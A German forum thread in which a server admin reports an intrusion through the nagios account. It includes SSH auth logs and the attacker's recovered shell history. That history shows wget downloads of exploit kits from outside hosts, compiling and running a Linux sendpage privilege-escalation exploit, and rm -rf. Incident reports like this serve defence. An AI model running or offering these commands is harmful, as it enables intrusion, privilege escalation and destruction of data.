• This forum has a zero tolerance policy regarding spam. If you register here to publish advertising, your user account will be deleted without further questions.

[DRINGEND] Exploit in nagios? (apt)

dark alex

Depp vom Dienst
Moin!

Ich habe mich gerade gewundert dass emin Mailserver keine Mails mehr annimmt (Temp delivery error). Beim Blick ind ie Logs mault amavis "cannot allocate memory" und tatsächlich - 200%CPU und 98% RAM belegt von einem Prozess namens "./exploit" - ausgeführt vom User "nagios"

Ist etwas bekannt, oder ist das nur ein harmloser Prozess vom echten nagios?

Ich habe den server schnell rebootet, da nichtsmehr ging und selbst kill seine Arbeit verweigerte. ein find / -name "exploit" brachte null Ergebnisse. cat /var/log/syslo*|grep exploit ebenfalls nichts.

Kann es sein, dass nagios ein Standardpasswort für sienen Account setzt und den login nciht verbietet, was eigentlich ja für apt-installationen untypisch ist?


auth.log:
Code:
...

Dec 24 15:01:09 fse su[1929]: + console root:nagios
Dec 24 15:01:09 fse su[1929]: pam_unix(su:session): session opened for user nagios by (uid=0)
Dec 24 15:01:09 fse su[1929]: pam_unix(su:session): session closed for user nagios

<< Seit hier bin ich nichtmehr am Server gewesen. >>

Dec 24 19:33:23 fse sshd[29935]: Accepted password for nagios from 212.18.195.102 port 41583 ssh2
Dec 24 19:33:23 fse sshd[29935]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 24 19:33:23 fse sshd[29937]: Accepted password for nagios from 212.18.195.102 port 55304 ssh2
Dec 24 19:33:23 fse sshd[29937]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 24 19:33:29 fse sshd[29935]: pam_unix(sshd:session): session closed for user nagios
Dec 24 19:33:29 fse sshd[29937]: pam_unix(sshd:session): session closed for user nagios
Dec 25 06:11:33 fse sshd[2094]: Accepted password for nagios from 77.42.228.134 port 49571 ssh2
Dec 25 06:11:33 fse sshd[2094]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 25 06:11:40 fse sshd[2094]: pam_unix(sshd:session): session closed for user nagios
Dec 25 06:11:50 fse sshd[2133]: Accepted password for nagios from 77.42.228.134 port 49572 ssh2
Dec 25 06:11:50 fse sshd[2133]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 25 06:11:54 fse sshd[2133]: pam_unix(sshd:session): session closed for user nagios
Dec 25 07:37:23 fse sshd[19612]: Accepted password for nagios from 77.42.228.134 port 49852 ssh2
Dec 25 07:37:23 fse sshd[19612]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 25 07:37:32 fse passwd[19660]: pam_unix(passwd:chauthtok): password changed for nagios
Dec 25 07:37:34 fse sshd[19612]: pam_unix(sshd:session): session closed for user nagios
Dec 25 07:37:50 fse sshd[19680]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=77.42.228.134  user=nagios
Dec 25 07:37:53 fse sshd[19680]: Failed password for nagios from 77.42.228.134 port 49856 ssh2
Dec 25 07:37:58 fse sshd[19680]: Accepted password for nagios from 77.42.228.134 port 49856 ssh2
Dec 25 07:37:58 fse sshd[19680]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 25 07:38:01 fse sshd[19680]: pam_unix(sshd:session): session closed for user nagios
Dec 26 10:49:19 fse sshd[32591]: Accepted password for nagios from 77.42.137.153 port 49602 ssh2
Dec 26 10:49:19 fse sshd[32591]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 26 10:50:11 fse sshd[32591]: pam_unix(sshd:session): session closed for user nagios
Dec 26 14:28:24 fse sshd[5302]: Accepted password for nagios from 94.187.88.190 port 51187 ssh2
Dec 26 14:28:24 fse sshd[5302]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 26 14:28:30 fse sshd[5302]: pam_unix(sshd:session): session closed for user nagios
Dec 26 15:03:58 fse sshd[6116]: Accepted password for nagios from 94.187.88.190 port 51389 ssh2
Dec 26 15:03:58 fse sshd[6116]: pam_unix(sshd:session): session opened for user nagios by (uid=0)
Dec 26 15:07:27 fse sshd[6116]: pam_unix(sshd:session): session closed for user nagios

<< hier bin ich wieder rein >>

Dec 27 02:00:42 fse su[1917]: Successful su for nagios by root
Dec 27 02:00:42 fse su[1917]: + console root:nagios
Dec 27 02:00:42 fse su[1917]: pam_unix(su:session): session opened for user nagios by (uid=0)
Dec 27 02:00:42 fse su[1917]: pam_unix(su:session): session closed for user nagios


also wenn nichts bekannt ist, werde ich Anzeige gegen unbekannt über die IP wegen unbefugten eindringens in den Server erstatten.




//Edit: Okay Anzeige:
Code:
w
uname -a
exit
w
exit
passwd
exit
exit
uname -a
exit
id
wget http://www.freewebtown.com/lavasoul/null.gz
tar zxvf null.gz
cd enlightenment/
./run_null_exploits.sh
id
./run_null_exploits.sh
ls
uname -a
cd ..
ls
rm -rf *
exit
ls
uname -a
ls
ps -x
gcc
mkdir .x
cd .x
wget http://208.75.230.43/lavasoul/lsp.txt
mv lsp.txt linux-sendpage.c
gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
./linux-sendpage
exit
 
Hi,

da scheint dann wohl wirklich jemand unbefugt in Deinen Server eingedrungen zu sein. Andererseits hast Du als Administrator des Systems dann aber fahrlässig gehandelt, da Du dem User "nagios" ja scheinbar eine Loginshell zugewiesen hast.
Auch wenn dies bei deiner Installation vielleicht standardmäßig so war, hättest du dich um die Berechtigungen des Benutzers kümmern sollen, gleich nachdem dieser angelegt wurde.


-W
 
Ja da haste leider recht... hab das auch gerade behoben. Werde demnächst mal gucken ob ich da an den paketmaintainer ne MAil shchicke dass das mal geändert wird.

Ich gucke grade wohin die IPs führen. die 77.irgendwas sieht mir fast nach Hetzner IPs aus - Ne das 77er Klasse A gehört irgendeinem, dessen Ländercode ich noch nie gehört habe - Mist!
 
Last edited by a moderator:
Back
Top